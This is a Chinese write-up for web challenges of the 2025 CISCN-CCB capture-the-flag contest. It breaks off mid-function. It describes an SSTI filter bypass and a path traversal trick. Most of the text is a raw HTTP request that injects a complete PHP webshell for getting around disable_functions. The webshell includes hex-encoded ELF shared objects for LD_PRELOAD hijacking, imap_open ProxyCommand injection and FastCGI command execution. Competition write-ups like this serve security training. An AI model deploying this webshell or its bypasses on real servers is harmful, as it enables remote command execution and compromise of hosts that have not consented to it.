2025CISCN-CCB

web

Safe_Proxy

主页直接给代码了

先改代码

@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # 安全过滤
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(template_code)
    return result

需要把result返回，并且要把传入的code输出用来记录payload

然后把flask监听改成0.0.0.0

然后fenjing直接梭

fenjing webui

直接爆破即可，最终日志得到执行命令的payload，注意需要

可以得到ls的payload

将flag写入app.py，之后直接通过get的方式读取__file__

hello_web

随便输点，可以看到../hackme.php和tips.php

../经过尝试猜测被过滤，双写进行绕过

tips有phpinfo，然后可以看到一堆disable function

hackme有一段代码，大概是这样的

这张是当时调试的图片，忘记截屏了

base64可以解码

把里面eval改成echo，可以看到执行的内容，前提是把这段代码和前面刚刚那个截屏放在一起

然后传参数的时候要注意php非法参数名的事情

需要传cmd[66.99=xxx

之后因为有disbale function，使用github的项目绕过即可

https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php

用这个shell.php

之后稍微改一下

POST /index.php?file=../....//hackme.php HTTP/1.1
Host: eci-2ze4xxsimq68wmh5do7k.cloudeci1.ichunqiu.com:80
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://eci-2ze8chizbklyqw43ji9i.cloudeci1.ichunqiu.com/index.php?file=hello.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

cmd[66.99={{url(?><?php
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";

if(is_x64()){
    define(ARCH, 64);
}else{
    define(ARCH, 32);
}

$OS = strtoupper(substr(PHP_OS,0,3));
if($OS === 'WIN') {
    define(OS, 'Windows');
}elseif ($OS === 'DAR'){
    define(OS, 'Darwin');
}else{
    define(OS, 'Linux');
}
unset($OS);

define(WRITE_DIR, sys_get_temp_dir() . DIRECTORY_SEPARATOR);
define(FAILURE, '3ee28fe1a60c95b89d29317f122c7021');

$disable_function_str = get_cfg_var("disable_functions");
$disable_function_arr = explode(",",$disable_function_str);

$vul_function_str = 'dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,error_log,mb_send_mail,putenv,ini_set,apache_setenv,symlink,link';
$vul_function_arr = explode(",", $vul_function_str);

$open_basedir = get_cfg_var("open_basedir");

$myscript = $_SERVER['PHP_SELF'];

$GLOBALS["system_so_x64"] = "7f454c4602010100000000000000000003003e0001000000c006000000000000400000000000000028140000000000000000000040003800060040001c001900010000000500000000000000000000000000000000000000000000000000000004090000000000000409000000000000000020000000000001000000060000000809000000000000080920000000000008092000000000005802000000000000600200000000000000002000000000000200000006000000280900000000000028092000000000002809200000000000c001000000000000c0010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050e57464040000008408000000000000840800000000000084080000000000001c000000000000001c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000040000001400000003000000474e550066bb9e247f3731670b5cdfd534ac53233e576aef00000000030000000d000000010000000600000088c22001001440090d0000000f000000110000004245d5ecbbe3927cd871581cb98df10eead3ef0e6d1287c2000000000000000000000000000000000000000000000000000000000000000003000900380600000000000000000000000000007d00000012000000000000000000000000000000000000001c00000020000000000000000000000000000000000000008b00000012000000000000000000000000000000000000009d00000021000000000000000000000000000000000000000100000020000000000000000000000000000000000000009e00000011000000000000000000000000000000000000006100000020000000000000000000000000000000000000009c0000001100000000000000000000000000000000000000380000002000000000000000000000000000000000000000520000002200000000000000000000000000000000000000840000001200000000000000000000000000000000000000a600000010001600600b2000000000000000000000000000b900000010001700680b2000000000000000000000000000ad00000010001700600b20000000000000000000000000001000000012000900380600000000000000000000000000001600000012000c00600800000000000000000000000000007500000012000b00c0070000000000009d00000000000000005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f49544d5f64657265676973746572544d436c6f6e655461626c65005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e3500000000000200000002000200000002000000020000000200020001000100010001000100010001000100920000001000000000000000751a690900000200be00000000000000080920000000000008000000000000009007000000000000180920000000000008000000000000005007000000000000580b2000000000000800000000000000580b200000000000100920000000000001000000120000000000000000000000e80a20000000000006000000030000000000000000000000f00a20000000000006000000060000000000000000000000f80a20000000000006000000070000000000000000000000000b20000000000006000000080000000000000000000000080b200000000000060000000a0000000000000000000000100b200000000000060000000b0000000000000000000000300b20000000000007000000020000000000000000000000380b20000000000007000000040000000000000000000000400b20000000000007000000060000000000000000000000480b200000000000070000000b0000000000000000000000500b200000000000070000000c00000000000000000000004883ec08488b05ad0420004885c07405e8430000004883c408c30000000000000000000000000000ff35ba042000ff25bc0420000f1f4000ff25ba0420006800000000e9e0ffffffff25b20420006801000000e9d0ffffffff25aa0420006802000000e9c0ffffffff25a20420006803000000e9b0ffffffff259a0420006804000000e9a0ffffff488d3d99042000488d0599042000554829f84889e54883f80e7615488b05060420004885c074095dffe0660f1f4400005dc366666666662e0f1f840000000000488d3d59042000488d3552042000554829fe4889e548c1fe034889f048c1e83f4801c648d1fe7418488b05d90320004885c0740c5dffe0660f1f8400000000005dc366666666662e0f1f840000000000803d0904200000752748833daf03200000554889e5740c488b3dea032000e82dffffffe848ffffff5dc605e003200001f3c366666666662e0f1f840000000000488d3d8901200048833f00750be95effffff660f1f440000488b05510320004885c074e9554889e5ffd05de940ffffff554889e54883ec10488d3d9a000000e89cfeffff488945f0c745fc00000000eb4f488b0510032000488b008b55fc4863d248c1e2034801d0488b00488d35740000004889c7e8a6feffff4885c0741d488b05e2022000488b008b55fc4863d248c1e2034801d0488b00c600008345fc01488b05c1022000488b008b55fc4863d248c1e2034801d0488b004885c07592488b45f04889c7e825feffffc9c30000004883ec084883c408c34556494c5f434d444c494e45004c445f5052454c4f414400000000011b033b1800000002000000dcfdffff340000003cffffff5c0000001400000000000000017a5200017810011b0c070890010000240000001c000000a0fdffff60000000000e10460e184a0f0b770880003f1a3b2a332422000000001c00000044000000d8feffff9d00000000410e108602430d0602980c0708000000000000000000009007000000000000000000000000000050070000000000000000000000000000010000000000000092000000000000000c0000000000000038060000000000000d000000000000006008000000000000190000000000000008092000000000001b0000000000000010000000000000001a0000000000000018092000000000001c000000000000000800000000000000f5feff6f00000000b8010000000000000500000000000000c0030000000000000600000000000000f8010000000000000a00000000000000ca000000000000000b0000000000000018000000000000000300000000000000180b20000000000002000000000000007800000000000000140000000000000007000000000000001700000000000000c0050000000000000700000000000000d0040000000000000800000000000000f00000000000000009000000000000001800000000000000feffff6f00000000b004000000000000ffffff6f000000000100000000000000f0ffff6f000000008a04000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000280920000000000000000000000000000000000000000000760600000000000086060000000000009606000000000000a606000000000000b606000000000000580b2000000000004743433a202844656269616e20342e392e322d31302b6465623875322920342e392e3200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e740000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200b80100000000000000000000000000000000000003000300f80100000000000000000000000000000000000003000400c003000000000000000000000000000000000000030005008a0400000000000000000000000000000000000003000600b00400000000000000000000000000000000000003000700d00400000000000000000000000000000000000003000800c00500000000000000000000000000000000000003000900380600000000000000000000000000000000000003000a00600600000000000000000000000000000000000003000b00c00600000000000000000000000000000000000003000c00600800000000000000000000000000000000000003000d00690800000000000000000000000000000000000003000e00840800000000000000000000000000000000000003000f00a00800000000000000000000000000000000000003001000080920000000000000000000000000000000000003001100180920000000000000000000000000000000000003001200200920000000000000000000000000000000000003001300280920000000000000000000000000000000000003001400e80a20000000000000000000000000000000000003001500180b20000000000000000000000000000000000003001600580b20000000000000000000000000000000000003001700600b2000000000000000000000000000000000000300180000000000000000000000000000000000010000000400f1ff000000000000000000000000000000000c00000001001200200920000000000000000000000000001900000002000b00c00600000000000000000000000000002e00000002000b00000700000000000000000000000000004100000002000b00500700000000000000000000000000005700000001001700600b20000000000001000000000000006600000001001100180920000000000000000000000000008d00000002000b0090070000000000000000000000000000990000000100100008092000000000000000000000000000b80000000400f1ff00000000000000000000000000000000010000000400f1ff00000000000000000000000000000000cd00000001000f0000090000000000000000000000000000db0000000100120020092000000000000000000000000000000000000400f1ff00000000000000000000000000000000e700000001001600580b2000000000000000000000000000f40000000100130028092000000000000000000000000000fd00000001001600600b20000000000000000000000000000901000001001500180b20000000000000000000000000001f01000012000000000000000000000000000000000000003301000020000000000000000000000000000000000000004f01000010001600600b20000000000000000000000000005601000012000c00600800000000000000000000000000005c01000012000000000000000000000000000000000000007001000020000000000000000000000000000000000000007f01000011000000000000000000000000000000000000009401000010001700680b20000000000000000000000000009901000010001700600b2000000000000000000000000000a501000012000b00c0070000000000009d00000000000000ad0100002000000000000000000000000000000000000000c10100001100000000000000000000000000000000000000d80100002000000000000000000000000000000000000000f201000022000000000000000000000000000000000000000e02000012000900380600000000000000000000000000001402000012000000000000000000000000000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e65730072656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e36363730005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006279706173735f64697361626c6566756e632e63005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00676574656e764040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c65005f6564617461005f66696e690073797374656d4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f00656e7669726f6e4040474c4942435f322e322e35005f656e64005f5f6273735f7374617274007072656c6f6164005f4a765f5265676973746572436c6173736573005f5f656e7669726f6e4040474c4942435f322e322e35005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e6974007374727374724040474c4942435f322e322e3500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000b801000000000000b8010000000000003c00000000000000030000000000000008000000000000000000000000000000380000000b0000000200000000000000f801000000000000f801000000000000c80100000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000c003000000000000c003000000000000ca0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f02000000000000008a040000000000008a04000000000000260000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000b004000000000000b004000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000d004000000000000d004000000000000f0000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000c005000000000000c0050000000000007800000000000000030000000a0000000800000000000000180000000000000078000000010000000600000000000000380600000000000038060000000000001a00000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000006006000000000000600600000000000060000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000c006000000000000c0060000000000009d01000000000000000000000000000010000000000000000000000000000000840000000100000006000000000000006008000000000000600800000000000009000000000000000000000000000000040000000000000000000000000000008a00000001000000020000000000000069080000000000006908000000000000180000000000000000000000000000000100000000000000000000000000000092000000010000000200000000000000840800000000000084080000000000001c00000000000000000000000000000004000000000000000000000000000000a0000000010000000200000000000000a008000000000000a0080000000000006400000000000000000000000000000008000000000000000000000000000000aa0000000e0000000300000000000000080920000000000008090000000000001000000000000000000000000000000008000000000000000000000000000000b60000000f0000000300000000000000180920000000000018090000000000000800000000000000000000000000000008000000000000000000000000000000c2000000010000000300000000000000200920000000000020090000000000000800000000000000000000000000000008000000000000000000000000000000c700000006000000030000000000000028092000000000002809000000000000c001000000000000040000000000000008000000000000001000000000000000d0000000010000000300000000000000e80a200000000000e80a0000000000003000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000180b200000000000180b0000000000004000000000000000000000000000000008000000000000000800000000000000de000000010000000300000000000000580b200000000000580b0000000000000800000000000000000000000000000008000000000000000000000000000000e4000000080000000300000000000000600b200000000000600b0000000000000800000000000000000000000000000001000000000000000000000000000000e90000000100000030000000000000000000000000000000600b0000000000002400000000000000000000000000000001000000000000000100000000000000110000000300000000000000000000000000000000000000840b000000000000f200000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000780c00000000000088050000000000001b0000002b0000000800000000000000180000000000000009000000030000000000000000000000000000000000000000120000000000002802000000000000000000000000000001000000000000000000000000000000";
$GLOBALS["system_so_x32"] = "7f454c4601010100000000000000000003000300010000001004000034000000080800000000000034002000050028001b00180001000000000000000000000000000000f0050000f0050000050000000010000001000000f0050000f0150000f01500000c010000140100000600000000100000020000000c0600000c1600000c160000c0000000c0000000060000000400000004000000d4000000d4000000d40000002400000024000000040000000400000051e5746400000000000000000000000000000000000000000600000004000000040000001400000003000000474e550046274bfc049fbd2fbee3fc9508888b1312b57aab030000000a00000002000000060000008800200100d640090a0000000c0000000e000000bae3927c4345d5ecd871581cb98df10e6c1287c2ebd3ef0e00000000000000000000000000000000010000000000000000000000200000002b0000000000000000000000200000004700000000000000000000001200000055000000000000000000000012000000680000000000000000000000110000004e00000000000000000000001200000067000000000000000000000021000000660000000000000000000000110000001c0000000000000000000000220000008300000004170000000000001000f1ff70000000fc160000000000001000f1ff77000000fc160000000000001000f1ff100000007c03000000000000120009003f000000e00400009400000012000b0016000000b80500000000000012000c00005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573007072656c6f616400676574656e76007374727374720073797374656d006c6962632e736f2e36005f5f656e7669726f6e005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e300000000000000002000200020002000200020003000100010001000100010001000000010002005c0000001000000000000000731f69090000030088000000100000001069690d0000020094000000000000000816000008000000f4150000010e0000cc16000006010000d016000006020000d416000006050000d816000006090000e816000007010000ec16000007030000f016000007040000f416000007060000f8160000070900005589e55383ec04e8000000005b81c3541300008b93f0ffffff85d27405e81e000000e8fd000000e8d8010000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffffffa3140000006810000000e9c0ffffffffa3180000006818000000e9b0ffffffffa31c0000006820000000e9a0ffffff000000005589e55653e8bf00000081c3c21200008d6424f080bb2000000000755c8b83fcffffff85c0740e8d832cffffff890424e8b7ffffff8db324ffffff8d9320ffffff29d68b8324000000c1fe0283ee0139f0731f908d74260083c001898324000000ff948320ffffff8b832400000039f072e6c68320000000018d6424105b5e5dc3eb0d909090909090909090909090905589e553e83000000081c3331200008d6424ec8b9328ffffff85d274158b83f4ffffff85c0740b8d9328ffffff891424ffd08d6424145b5dc38b1c24c39090905589e55383ec24e8edffffff81c3f01100008d83f8eeffff890424e8ccfeffff8945f0c745f400000000eb418b83f8ffffff8b008b55f4c1e20201d08b008d9305efffff89542404890424e8bcfeffff85c074158b83f8ffffff8b008b55f4c1e20201d08b00c600008345f4018b83f8ffffff8b008b55f4c1e20201d08b0085c075a98b45f0890424e86efeffff83c4245b5dc39090909090909090909090905589e55653e84fffffff81c3521100008b8318ffffff83f8ff74198db318ffffff8db426000000008d76fcffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c318110000e840feffff595bc9c34556494c5f434d444c494e45004c445f5052454c4f41440000000000ffffffff0000000000000000ffffffff000000000000000008160000010000005c0000000c0000007c0300000d000000b8050000f5feff6ff8000000050000003402000006000000340100000a0000009e0000000b0000001000000003000000dc160000020000002800000014000000110000001700000054030000110000002403000012000000300000001300000008000000feffff6ff4020000ffffff6f01000000f0ffff6fd2020000faffff6f0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c1600000000000000000000c2030000d2030000e2030000f2030000020400004743433a2028474e552920342e342e3720323031323033313320285265642048617420342e342e372d32332900002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e646174612e72656c2e726f002e64796e616d6963002e676f74002e676f742e706c74002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000001b0000000700000002000000d4000000d400000024000000000000000000000004000000000000002e000000f6ffff6f02000000f8000000f80000003c00000003000000000000000400000004000000380000000b000000020000003401000034010000000100000400000001000000040000001000000040000000030000000200000034020000340200009e0000000000000000000000010000000000000048000000ffffff6f02000000d2020000d2020000200000000300000000000000020000000200000055000000feffff6f02000000f4020000f40200003000000004000000010000000400000000000000640000000900000002000000240300002403000030000000030000000000000004000000080000006d0000000900000002000000540300005403000028000000030000000a00000004000000080000007600000001000000060000007c0300007c0300003000000000000000000000000400000000000000710000000100000006000000ac030000ac03000060000000000000000000000004000000040000007c00000001000000060000001004000010040000a801000000000000000000001000000000000000820000000100000006000000b8050000b80500001c00000000000000000000000400000000000000880000000100000002000000d4050000d40500001800000000000000000000000100000000000000900000000100000002000000ec050000ec05000004000000000000000000000004000000000000009a0000000100000003000000f0150000f00500000c00000000000000000000000400000000000000a10000000100000003000000fc150000fc0500000800000000000000000000000400000000000000a8000000010000000300000004160000040600000400000000000000000000000400000000000000ad000000010000000300000008160000080600000400000000000000000000000400000000000000ba00000006000000030000000c1600000c060000c000000004000000000000000400000008000000c30000000100000003000000cc160000cc0600001000000000000000000000000400000004000000c80000000100000003000000dc160000dc0600002000000000000000000000000400000004000000d10000000800000003000000fc160000fc0600000800000000000000000000000400000000000000d6000000010000003000000000000000fc0600002d000000000000000000000001000000010000001100000003000000000000000000000029070000df0000000000000000000000010000000000000001000000020000000000000000000000400c0000900300001a0000002b000000040000001000000009000000030000000000000000000000d00f0000df010000000000000000000001000000000000000000000000000000000000000000000000000000d4000000000000000300010000000000f80000000000000003000200000000003401000000000000030003000000000034020000000000000300040000000000d2020000000000000300050000000000f402000000000000030006000000000024030000000000000300070000000000540300000000000003000800000000007c030000000000000300090000000000ac0300000000000003000a0000000000100400000000000003000b0000000000b80500000000000003000c0000000000d40500000000000003000d0000000000ec0500000000000003000e0000000000f01500000000000003000f0000000000fc15000000000000030010000000000004160000000000000300110000000000081600000000000003001200000000000c160000000000000300130000000000cc160000000000000300140000000000dc160000000000000300150000000000fc1600000000000003001600000000000000000000000000030017000100000000000000000000000400f1ff0c000000f01500000000000001000f001a000000fc15000000000000010010002800000004160000000000000100110035000000100400000000000002000b004b000000fc16000001000000010016005a00000000170000040000000100160068000000a00400000000000002000b000100000000000000000000000400f1ff74000000f81500000000000001000f0081000000ec0500000000000001000e008f0000000416000000000000010011009b000000800500000000000002000b00b100000000000000000000000400f1ffc6000000dc160000000000000100f1ffdc000000081600000000000001001200e9000000001600000000000001001000f6000000d90400000000000002000b000d0100000c160000000000000100f1ff16010000e00400009400000012000b001e0100000000000000000000200000002d0100000000000000000000200000004101000000000000000000001200000053010000b80500000000000012000c00590100000000000000000000120000006b0100000000000000000000110000007e01000000000000000000001200000090010000fc160000000000001000f1ff9c01000004170000000000001000f1ffa1010000000000000000000011000000b6010000fc160000000000001000f1ffbd010000000000000000000022000000d90100007c03000000000000120009000063727473747566662e63005f5f43544f525f4c4953545f5f005f5f44544f525f4c4953545f5f005f5f4a43525f4c4953545f5f005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e353938360064746f725f6964782e35393838006672616d655f64756d6d79005f5f43544f525f454e445f5f005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f646f5f676c6f62616c5f63746f72735f617578006279706173735f64697361626c6566756e632e63005f474c4f42414c5f4f46465345545f5441424c455f005f5f64736f5f68616e646c65005f5f44544f525f454e445f5f005f5f693638362e6765745f70635f7468756e6b2e6278005f44594e414d4943007072656c6f6164005f5f676d6f6e5f73746172745f5f005f4a765f5265676973746572436c617373657300676574656e764040474c4942435f322e30005f66696e690073797374656d4040474c4942435f322e3000656e7669726f6e4040474c4942435f322e30007374727374724040474c4942435f322e30005f5f6273735f7374617274005f656e64005f5f656e7669726f6e4040474c4942435f322e30005f6564617461005f5f6378615f66696e616c697a654040474c4942435f322e312e33005f696e697400";

$GLOBALS["php_so_x64"] = "";
$GLOBALS["php_so_x32"] = "";

//$plugin_func_arr = array(
//    "common_exec_cmd" => array("exec", "shell_exec", "system", "passthru", "popen", "proc_open"),
//    "load_so" => array("dl"),
//    "ld_preload_so" => array("mail", "error_log", "imap_mail", "mb_send_mail"),
//    "shellshock" => array("mail"),
//    "apache_mod_cgi" => array(),
//    "imagick" => array(),
//    "pwn" => array(),
//);

echo "Temp Dir:" . WRITE_DIR . "<br>";
echo "Arch: " . ARCH . "; OS: " . OS . "<br><br>";

foreach ($vul_function_arr as $func) {
        if (function_exists($func)){
            echo "<font style='color: red'>Exist: ".$func."</font><br>";
        } else {
            echo "no exist: ".$func."<br>";
        }
}

function read_file($filename){
    if(function_exists('file_get_contents')){
        return file_get_contents($filename);
    } elseif (function_exists('fopen') && function_exists('fread')){
        $handle = fopen($filename, 'r');
        $content = '';
        while(!feof($handle)){
            $content .= fread($handle, 1000);
        }
        fclose($handle);
        return $content;
    } else {
        echo "no read function";
        return;
    }
}

function write_file($filename, $content, $model="w"){
    if (function_exists('file_put_contents')) {
        file_put_contents($filename, $content);
    } else {
        echo "no write function";
        return;
    }
}

function random_str($len = 8) {
    $s = '';
    for ($i = 0; $i < $len; $i++) {
        $s .= chr(mt_rand(33, 126));
    }
    return $s;
}

function is_x64() {
    $int = "9223372036854775807";
    $int = intval($int);
    if ($int == 9223372036854775807) {
        return true;
    }
    elseif ($int == 2147483647) {
        return false;
    }
    else {
        return "error";
    }
}

function trans_cmd($cmd, $outfile){
    if (OS == 'Windows'){
        $cmd = $cmd . " > " . $outfile;
    }else{
        $cmd = $cmd . " > " . $outfile . " 2>&1";
    }
    return $cmd;
}

function send_cmd_to_file($cmd, $file = 'cmd', $result = 'result') {
    $outfile = WRITE_DIR . $result;
    $cmdfile = WRITE_DIR . $file;

    $cmd = trans_cmd($cmd, $outfile);

    write_file($cmdfile, $cmd);
    return array(
        $cmdfile,
        $outfile
    );
}

function send_cmd($cmd, $result = 'result') {
    $outfile = WRITE_DIR . $result;

    $cmd = trans_cmd($cmd, $outfile);

    return array(
        $cmd,
        $outfile
    );
}

function recv_result($result = 'result') {
    $ret = read_file($result);
    @unlink($result);
    return $ret;
}

function send_socket($data, $host, $port=9000) {
    if ( function_exists('stream_socket_client') ) {
        if (strpos($host,'unix://') !== false) {
            $client = $host;
        } else {
            $client = 'tcp://' . $host . ':' . $port;
        }

        $fp = stream_socket_client($client);
    } elseif (function_exists('fsockopen')) {
        $fp = fsockopen($host, $port, $errno, $errstr, 30);
    } else {
        return FAILURE;
    }

    if ($fp) {
        $content = "";
        fwrite($fp, $data);
        while (!feof($fp)) {
            $content .= fgets($fp, 4096);
        }
        fclose($fp);
        return $content;
    } else {
        return FAILURE;
    }
}

/*
 * 第一种: 常规绕过, 寻找漏掉的命令执行函数, 适用于winodws + linux
 * exec、shell_exec、system、passthru、popen、proc_open
 */

function common_exec_cmd($cmd) {
    $res = '';
    if (function_exists('exec')) {
        @exec($cmd, $res);
        $res = join("\n", $res);
    } elseif (function_exists('shell_exec')) {
        $res = @shell_exec($cmd);
    } elseif (function_exists('system')) {
        @ob_start();
        @system($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (function_exists('passthru')) {
        @ob_start();
        @passthru($cmd);
        $res = @ob_get_contents();
        @ob_end_clean();
    } elseif (@is_resource($f = @popen($cmd, "r"))) {
        $res = '';
        while (!@feof($f)) {$res .= @fread($f, 1024);}
        @pclose($f);
    } elseif (function_exists('proc_open')) {
        $descriptorspec = array(
            0 => array("pipe", "r"),
            1 => array("pipe", "w"),
            2 => array("pipe", "w")
        );
        $process = proc_open($cmd, $descriptorspec, $pipes, null, null);
        if (is_resource($process)) {
            fwrite($pipes[0], '$stdin');
            fclose($pipes[0]);
            $res = stream_get_contents($pipes[1]);
        }else{
            return FAILURE;
        }
    } else {
        return FAILURE;
    }
    return $res;
}

/*
 * 第二种: pcntl_exec绕过
 */

function pcntl_exec_cmd($cmd) {
    if (function_exists('pcntl_exec')) {
        $cmd_arr = send_cmd_to_file($cmd, 'cmd.sh');
        pcntl_exec("/bin/bash", array($cmd_arr[0]));
        return recv_result($cmd_arr[1]);
    } else {
        return FAILURE;
    }
}

//echo pcntl_exec_cmd("id");

/*
 * 第三种: ld_preload绕过: 仅限Linux
 * mail、imap_mail、error_log、mb_send_mail
 * From: https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD/
 */

function ld_preload_exec_cmd($cmd) {
    $so_file = WRITE_DIR . 'system.so';

    if (ARCH === 64) {
        write_file($so_file, hex2bin($GLOBALS['system_so_x64']));
    } else {
        write_file($so_file, hex2bin($GLOBALS['system_so_x32']));
    }

    $cmd_arr = send_cmd($cmd, 'result');
    putenv("EVIL_CMDLINE=" . $cmd_arr[0]);
    putenv("LD_PRELOAD=" . $so_file);

    if (function_exists('error_log')){
        error_log("", 1, "example@example.com");
    } elseif (function_exists('mail')){
        mail("", "", "", "");
    } elseif (function_exists('mb_send_mail')){
        mb_send_mail("","","");
    } elseif ((function_exists('imap_mail'))){
        imap_mail("","","");
    } else {
        @unlink($so_file);
        return FAILURE;
    }

    // del so file
    @unlink($so_file);
    return recv_result($cmd_arr[1]);
}

//echo ld_preload_exec_cmd($_GET['cmd']);

//$so_file = WRITE_DIR . 'system_x32.so';
//var_dump(bin2hex(read_file($so_file)));

/*
 * 第四种: ld加载php扩展:
 * ld
 * https://github.com/Medicean/as_bypass_php_disable_functions
 * https://github.com/AntSwordProject/ant_php_extension
 */

function dl_exec($cmd){
    if(function_exists('dl')){
        $so_file = WRITE_DIR . 'php.so';

        if (ARCH === 64) {
            write_file($so_file, hex2bin($GLOBALS['php_so_x64']));
        } else {
            write_file($so_file, hex2bin($GLOBALS['php_so_x32']));
        }

        $so_file = "ant_x64.so";
        dl($so_file);
        $result = antsystem($cmd);

        // del so file
        @unlink($so_file);
        return $result;
    }else{
        return FAILURE;
    }
}

//echo dl_exec("id");

/*
 * 第五种: imap_open: 仅限Linux
 */

function imap_open_exec($cmd){
    if (function_exists('imap_open')) {
        $cmd_arr = send_cmd($cmd);
        $server = "x -oProxyCommand=echo\t" . base64_encode($cmd_arr[0]) . "|base64\t-d|sh}";
        imap_open('{' . $server . ':143/imap}INBOX', '', '');
        return recv_result($cmd_arr[1]);
    }else{
        return FAILURE;
    }
}

/*
 * FastCgi:
 * 9000 port
 * phpx.x-fpm.sock
 *
 * Fail: windows
 */

function p($ptr){
    return bin2hex(chr($ptr));
}

function pnv($len){
    if($len < 128){
        return p($len);
    }else{
        return p(($len >> 24) |0x80) . p(($len >> 16) & 0xFF) . p(($len >> 8) & 0xFF) . p($len & 0xFF);
    }
}

// 还需要更改具体的fastcgi参数, 目前能在linux下使用
//$host = 'unix:///run/php/php7.3-fpm.sock';
function fastcgi_exec($cmd, $file, $host, $port=9000){
    if (strlen($cmd) > 40) {
        echo "Bug: command len need < 40, will be fix.";
    }

    $cmd = base64_encode($cmd);
    $php_code = '<?php system(base64_decode("'.$cmd.'"));exit();?>';

    $php_code_len = strlen($php_code);
    $php_code_pad = p(($php_code_len >> 8) & 0xFF) . p($php_code_len & 0xFF) . p(0) . p(0);

    //$uri = bin2hex(__FILE__);
    //$uri = '/var/www/html/shell.php';
    $uri = $file;
    $uri_val_pad = pnv(strlen($uri));

